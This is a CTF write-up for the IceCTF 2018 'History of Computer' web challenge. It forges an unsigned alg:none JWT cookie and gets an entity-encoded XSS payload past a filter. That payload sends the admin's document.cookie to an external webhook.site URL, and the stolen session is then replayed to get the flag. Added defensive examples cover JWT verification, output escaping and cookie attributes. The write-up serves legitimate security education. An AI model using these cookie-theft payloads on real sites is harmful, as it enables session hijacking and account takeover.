IceCTF2018-History-Of-Computer

Solution

First thing on entering the site: there is a registration page, so register, log in and see what's on offer.
There's a comment feature, so leave one to try it out. After posting there's also a report button, so this has to be an XSS challenge, right?

There are two odd cookies, session and token.

They look like base64, so decode them and take a look.

import base64

# session cookie: three dot-separated parts, payload.timestamp.signature;
# decoding the whole string at once gives the payload followed by binary junk
base64.b64decode('eyJ1c2VyIjoyfQ.Dno_HQ.0n1XWQBTVFhQ9NxFkuqWKik5uJU==')
#{"user":2}\x00\xe7\xa0t4\x9fU\xd6@\x14\xd5\x16\x14=7\x11d\xba\xa5\x8a\x8aNn%

# token cookie: a JWT, header part then payload part
base64.b64decode('eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=')
#{"typ":"JWT","alg":"none"}
base64.b64decode('eyJ1c2VybmFtZSI6ImNhdHBhd24iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0==')
#{"username":"catpawn","flag":"IceCTF{hope you don\'t think this is a real flag}"}
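The token cookie decoded above carries `"alg":"none"` and no signature segment, which is exactly what lets the username be swapped later in this writeup. As an added example (not code from the writeup or from the challenge), here is a minimal verifier of the shape a server should use: the accepted algorithm comes from the server's own allow-list, never from the attacker-controlled header, so `none` and unsigned tokens are rejected before the payload is trusted. `DEMO_KEY`, `sign_hs256` and `peek_payload` are constructed for the demo; `PAGE_TOKEN` is the admin token that appears later on this page.

```python
import base64
import hashlib
import hmac
import json

# The token cookie from the writeup: alg "none" and an empty third segment.
PAGE_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0."
    "eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9."
)

# Constructed demo key; a real deployment loads it from config, never from the token.
DEMO_KEY = b"constructed-demo-key"


def b64url_decode(part: str) -> bytes:
    """Decode base64url regardless of how much '=' padding the sender included."""
    part = part.rstrip("=")
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def peek_payload(token: str) -> dict:
    """Decode the payload WITHOUT verifying: fine for inspection, never for authorization."""
    return json.loads(b64url_decode(token.split(".")[1]))


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    """Mint a properly signed HS256 token so the verifier below has a valid input to accept."""
    signing_input = ".".join(
        b64url_encode(json.dumps(p, separators=(",", ":")).encode()) for p in (header, payload)
    )
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_jwt(token: str, key: bytes, allowed_algs=("HS256",)):
    """Return the payload dict if the token verifies, otherwise None.

    The algorithm is checked against the server's allow-list, so a header
    claiming "none" (or any other downgrade) is refused before the signature
    is even examined. Only HS256 is implemented here.
    """
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
    except ValueError:  # wrong segment count, bad base64, bad JSON
        return None
    if header.get("alg") not in allowed_algs:
        return None  # alg "none" lands here
    if not sig_b64:
        return None  # empty third segment, as in PAGE_TOKEN
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    try:
        presented = b64url_decode(sig_b64)
    except ValueError:
        return None
    if not hmac.compare_digest(expected, presented):
        return None
    return json.loads(b64url_decode(payload_b64))
```

`peek_payload` reproduces the decode step of the writeup; it is what a debugging tool may do, and what an authorization check must never do. `verify_jwt` returns `None` for the page's token because of the algorithm check alone, so the empty-signature and constant-time comparison branches are defence in depth rather than the only line.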

So there's a username, and user is 2. If there is a 2 there should be a 1, so I guess the end goal is to get hold of user 1's login data?
Let's try changing the username.

import base64
base64.b64encode(b'{"username":"admin","flag":"IceCTF{hope you don\'t think this is a real flag}"}')
#eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9

After the change, the username in the top-right corner hadn't changed at all, so the only thing left was to leave a comment and see.

Still no change!!! A saved cookie can't be completely useless, so as a last resort I clicked into the comment to look.

And it changed!! So now we start crafting XSS payloads to play with the site.

import base64
base64.b64encode(b'{"username":"<script>alert(1)</script>","flag":"IceCTF{hope you don\'t think this is a real flag}"}')
#eyJ1c2VybmFtZSI6IjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0=

But it turns out there is filtering.

After a bunch of attempts it looks like quite a lot gets stripped. In the end this one turned out to work:

import base64
base64.b64encode(b'{"username":"<img src=x onerror=\'&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41\'>","flag":"IceCTF{hope you don\'t think this is a real flag}"}')
#eyJ1c2VybmFtZSI6IjxpbWcgc3JjPXggb25lcnJvcj0nJiMxMDYmIzk3JiMxMTgmIzk3JiMxMTUmIzk5JiMxMTQmIzEwNSYjMTEyJiMxMTYmIzU4JiM5NyYjMTA4JiMxMDEmIzExNCYjMTE2JiM0MCYjMzkmIzg4JiM4MyYjODMmIzM5JiM0MSc+IiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9

This string

&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41

is actually

javascript:alert('XSS')

You can use this site to do the conversion:
http://evuln.com/tools/xss-encoder/
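Why the entity-encoded handler got past the filter while the plain `<script>` version did not: the check was evidently applied to the raw string, whereas the browser decodes numeric character references (semicolons optional) before it ever runs the handler. Added example, not code from the writeup or the challenge: `naive_filter` and its `BLOCKED` list are a constructed stand-in for the challenge's unknown filter, `normalize` shows what the browser actually sees, and `render_username` shows the real fix, contextual output encoding, under which the same value is rendered as inert text no matter how it was encoded.

```python
import html

# Constructed sample: the entity-encoded handler body quoted in the writeup.
ENCODED = ("&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58"
           "&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41")

# Constructed copy of the username value the writeup put in the cookie.
USERNAME = "<img src=x onerror='" + ENCODED + "'>"

# Constructed blocklist; a stand-in for whatever the challenge actually checked.
BLOCKED = ("<script", "javascript:", "alert(")


def naive_filter(value: str) -> bool:
    """Blocklist check on the raw input. True means 'reject'.

    It sees the literal '&#106&#97...' and finds none of the blocked
    substrings, so the payload passes.
    """
    low = value.lower()
    return any(bad in low for bad in BLOCKED)


def normalize(value: str) -> str:
    """Decode character references the way a browser does (trailing ';' optional).

    html.unescape handles decimal, hex and named references, with or without
    the semicolon, which is what makes '&#106&#97' read back as 'ja'.
    """
    return html.unescape(value)


def render_username(value: str) -> str:
    """Contextual output encoding for an HTML text node.

    Every '<', '>', '&', '"' and "'" in the value becomes a character
    reference, so the browser shows the string instead of parsing it as
    markup. The attacker's own '&#106' survives only as '&amp;#106'.
    """
    return "<li>" + html.escape(value, quote=True) + "</li>"
```

The order matters: a filter that normalizes first (`naive_filter(normalize(value))`) at least catches this encoding, but output encoding at render time is what closes the whole class, because it does not depend on guessing every encoding the input might use.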

Then we can craft an HTTP request for the admin to make:

function httpGet(){var xmlHttp = new XMLHttpRequest();xmlHttp.open("GET", "https://webhook.site/928e4501-4b73-4491-a3de-10e0cad789cb?a=" + document.cookie, false );xmlHttp.send( null );}httpGet();

import base64
base64.b64encode(b'{"username":"<img src=x onerror=\'&#102&#117&#110&#99&#116&#105&#111&#110&#32&#104&#116&#116&#112&#71&#101&#116&#40&#41&#123&#118&#97&#114&#32&#120&#109&#108&#72&#116&#116&#112&#32&#61&#32&#110&#101&#119&#32&#88&#77&#76&#72&#116&#116&#112&#82&#101&#113&#117&#101&#115&#116&#40&#41&#59&#120&#109&#108&#72&#116&#116&#112&#46&#111&#112&#101&#110&#40&#34&#71&#69&#84&#34&#44&#32&#34&#104&#116&#116&#112&#115&#58&#47&#47&#119&#101&#98&#104&#111&#111&#107&#46&#115&#105&#116&#101&#47&#57&#50&#56&#101&#52&#53&#48&#49&#45&#52&#98&#55&#51&#45&#52&#52&#57&#49&#45&#97&#51&#100&#101&#45&#49&#48&#101&#48&#99&#97&#100&#55&#56&#57&#99&#98&#63&#97&#61&#34&#32&#43&#32&#100&#111&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101&#44&#32&#102&#97&#108&#115&#101&#32&#41&#59&#120&#109&#108&#72&#116&#116&#112&#46&#115&#101&#110&#100&#40&#32&#110&#117&#108&#108&#32&#41&#59&#125&#104&#116&#116&#112&#71&#101&#116&#40&#41&#59\'>","flag":"IceCTF{hope you don\'t think this is a real flag}"}')

Then click report and wait a few seconds:

https://webhook.site/928e4501-4b73-4491-a3de-10e0cad789cb?a=token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9.; session=eyJ1c2VyIjoxfQ.Dnm2FA.P93MJ-Nl9MSAc0DO0eRqNcUQGrU
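Both cookies reached the webhook because they were readable from `document.cookie`. An added example, not the challenge's code: a small audit over `Set-Cookie` header values that flags missing `HttpOnly`, `Secure` and `SameSite`, next to a helper that emits a hardened header. The two sample headers are constructed from the cookie values on this page with the attributes a bare setup would send; `Path=/` is assumed. `HttpOnly` alone would have kept this particular exfiltration from working (the script could still act on the admin's behalf in-page, but could not read the cookie); it does nothing about the `alg:none` token, which is a server-side verification problem.

```python
from http.cookies import SimpleCookie

# Constructed Set-Cookie headers: values as seen on this page, attributes as a
# bare setup would send them (no HttpOnly, no Secure, no SameSite).
SAMPLE_HEADERS = [
    "session=eyJ1c2VyIjoyfQ.Dno_HQ.0n1XWQBTVFhQ9NxFkuqWKik5uJU==; Path=/",
    "token=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0."
    "eyJ1c2VybmFtZSI6ImNhdHBhd24iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0.; Path=/",
]

# Morsel attribute name -> label used in the report.
REQUIRED = {"httponly": "HttpOnly", "secure": "Secure", "samesite": "SameSite"}


def audit_set_cookie(header: str) -> dict:
    """Return {cookie_name: [missing attribute labels]} for one Set-Cookie value.

    SimpleCookie parses the attributes; flag attributes (HttpOnly, Secure)
    come back as True when present and '' when absent, SameSite as its value.
    """
    jar = SimpleCookie()
    jar.load(header)
    report = {}
    for name, morsel in jar.items():
        report[name] = [label for attr, label in REQUIRED.items() if not morsel[attr]]
    return report


def hardened_set_cookie(name: str, value: str) -> str:
    """Emit a Set-Cookie value carrying the attributes a session cookie should have.

    HttpOnly: not exposed to document.cookie (the vector used in this writeup).
    Secure:   only sent over HTTPS.
    SameSite: Lax blocks the cookie on cross-site POSTs and embedded requests.
    """
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["path"] = "/"
    jar[name]["httponly"] = True
    jar[name]["secure"] = True
    jar[name]["samesite"] = "Lax"
    return jar[name].OutputString()


def audit_all(headers) -> dict:
    """Merge the per-header reports so a whole response can be checked at once."""
    merged = {}
    for header in headers:
        merged.update(audit_set_cookie(header))
    return merged
```

Running `audit_all(SAMPLE_HEADERS)` reports all three attributes missing on both cookies, while the output of `hardened_set_cookie` audits clean. `SameSite` requires Python 3.8 or later in `http.cookies`.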

Finally, get the flag!

import requests
cookie = {'token':'eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9.', 'session':'eyJ1c2VyIjoxfQ.Dnm2FA.P93MJ-Nl9MSAc0DO0eRqNcUQGrU'}
print(requests.get("https://43xa7xhkaj0cd8c-history.labs.icec.tf/", cookies=cookie).text)

<!DOCTYPE html>
<html>
<head>
<!--Import Google Icon Font-->
<link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
<!--Import materialize.css-->

<link type="text/css" rel="stylesheet" href="/static/css/materialize.min.css" media="screen,projection"/>
<link type="text/css" rel="stylesheet" href="/static/css/main.css" media="screen,projection"/>
<link type="text/css" rel="stylesheet" href="/static/css/style.css" media="screen,projection"/>

<!--Let browser know website is optimized for mobile-->
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
</head>
<body>

<nav>
<div class="nav-wrapper white">
<div class="container">
<a href="/" class="brand-logo">History of Computing</a>
<ul id="nav-mobile" class="right hide-on-med-and-down">

<li>admin</li>

<li><a href="/logout">Logout</a></li>

</ul>
</div>
</div>
</nav>



<div class="ribbon pink"></div>
<div class="container">

<div class="flag center blue white-text">
IceCTF{who_trusts_these_cookies_anyway?}
</div>

<div class="row post">
<div class="col s12">
<div class="card">
<div class="card-image">
<img src="/static/img/icectfteam.jpg">
<span class="card-title">The First Compiler</span>
</div>

<a class="btn-floating btn-large waves-effect waves-light pink comment-btn modal-trigger" href="#comment-modal" data-id="1"><i class="material-icons">comment</i></a>


<div class="card-content">
<h5>IceCTF Worked on The First Compiler</h5>
<p>It\'s not very commonly known, but the IceCTF actually worked on the first compiler with the famous Grace Hopper</p>
<p>The IceCTF team is responsible for a lot of the early achievements in the Computer Science field, not just the first compiler. Duis turpis nisl, accumsan ut pulvinar sit amet, vestibulum id justo. Nunc laoreet urna ut augue pellentesque, non tempus orci maximus. Aenean eget aliquet enim.</p>
<p>Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.</p>
</div>
</div>
</div>
</div>

</div>

<div class="ribbon cyan"></div>
<div class="container">
<div class="row">
<div class="col s12">
<div class="card">
<div class="card-image">
<img src="/static/img/eniac.jpg">
<span class="card-title">The ENIAC!</span>
</div>

<a class="btn-floating btn-large waves-effect waves-light cyan comment-btn modal-trigger" href="#comment-modal" data-id="2"><i class="material-icons">comment</i></a>

<div class="card-content">
<h5>The IceCTF Team Created The ENIAC!</h5>
<p>Along with the first compiler, the IceCTF also work on creating the very first computer. The ENIAC! </p>
<p>There\'s no suprise that the brilliant minds that made one of the most successful hacking competitions in 2018 also were involved with creating what is today known as "the first computer". Although the IceCTF team was not happy with how history decided to name their machine. They opted for the more hip name "puter".</p>
<p>Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.</p>
</div>
</div>
</div>
</div>

</div>


<footer class="page-footer grey darken-3">
<div class="container">
<div class="row">
<div class="col l6 s12">
<h5 class="white-text">About Me</h5>
<p class="grey-text text-lighten-4">I like blogging about images. I hope you join me on my journey of exploring the world with me!</p>
</div>
</div>
</div>
<div class="footer-copyright">
<div class="container">
Made with <a class="brown-text text-lighten-3" href="http://materializecss.com">Materialize</a>
</div>
</div>
</footer>

<div id="comment-modal" class="modal">
<nav class="cyan">
<div class="nav-wrapper">
<div class="left col s12 m5 l5">
<ul>
<li><a class="modal-action modal-close"><i class="material-icons">keyboard_backspace</i></a>
</li>

<li><a href="#!">Comment</a>
</li>
</ul>
</div>
<div class="col s12 m7 l7 hide-on-med-and-down">
<ul class="right">

<li><a class="modal-action modal-close comment-send"><i class=" material-icons">send</i></a>
</li>
</ul>
</div>

</div>
</nav>
<div class="modal-content">
<form id="comment-form" action="/comment" method="post">
<div class="input-field">
<textarea id="comment" class="materialize-textarea" length="500"></textarea>
<label for="comment">Comment</label>
</div>
<input type="hidden" name="postId" id="postId" value="2">
</form>
</div>
</div>
</div>



<!--Import jQuery before materialize.js-->
<script type="text/javascript" src="https://code.jquery.com/jquery-2.1.1.min.js"></script>
<script type="text/javascript" src="/static/js/materialize.min.js"></script>
<script type="text/javascript" src="/static/js/init.js"></script>
<script type="text/javascript" src="/static/js/main.js"></script>
</body>
</html>

Flag

IceCTF{who_trusts_these_cookies_anyway?}